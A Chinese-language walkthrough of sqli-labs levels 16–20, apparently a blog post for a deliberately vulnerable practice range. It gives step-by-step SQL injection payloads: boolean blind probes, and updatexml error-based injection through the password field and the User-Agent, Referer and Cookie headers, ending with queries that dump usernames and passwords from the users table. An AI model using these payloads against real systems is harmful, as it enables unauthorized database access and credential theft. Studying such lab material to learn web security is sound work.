主页有sqli-labs靶场通关攻略 1-15
第十六关 less-16
步骤一:判断闭合方式为admin") and 1=1#
步骤二:判断列数
admin") order by 2 # 数据正常
admin") order by 3 #数据报错
得出结果2列
步骤三:判断数据库长度
1") or length(database())=8 #
说明数据裤字符长度为8
步骤四:判断数据库名
1") or substr((select database()),1,1)='s' #
说明数据库的第一个字符为's'通过该语句得出数据库名为'sericuty'
步骤五:判断表名
(1)确定表数量
") or (select count(table_name) from information_schema.tables where table_schema=database())=4 #
说明有四个表
(2)表名:1") or substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e' #
找到user表
步骤六:判断表中列名
1") or substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u' #
users表中有username
步骤七:查询数据
1") or substr((select username from users limit 0,1),1,1)='D' #
第十七关 less-17
步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater
步骤二:在passwd=admin后输入'报错
闭合方式为' --+
步骤三:查询数据库
admin'and updatexml(1,concat(1,database()),1)--+
步骤四:查表名
admin' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+
步骤五:查列名
admin' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+
第十八关 less-18
步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater
步骤二:在User-agent后输入'报错
闭合方式为1' and'
步骤三:查询数据库
1'and updatexml(1,concat(1,database()),1)and'
步骤四:查表名
1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and'
步骤五:查列名
1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)and'
步骤六:查看users表中所有信息
1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'
第十九关 less-19
步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater
步骤二:在Referer后输入'报错
闭合方式为' and'
步骤三:查询数据库
'and updatexml(1,concat(1,database()),1)and'
步骤四:查表名
1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and'
步骤五:查列名
1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'
步骤六:查看users表中所有信息
1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'
第二十关 less-20
步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater
步骤二:在Cookie后输入'报错
闭合方式为' --+
步骤三:查询数据库
'and updatexml(1,concat(1,database()),1)--+
步骤四:查表名
' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+
步骤五:查列名
' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+
步骤六:查看表中信息
' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)--+
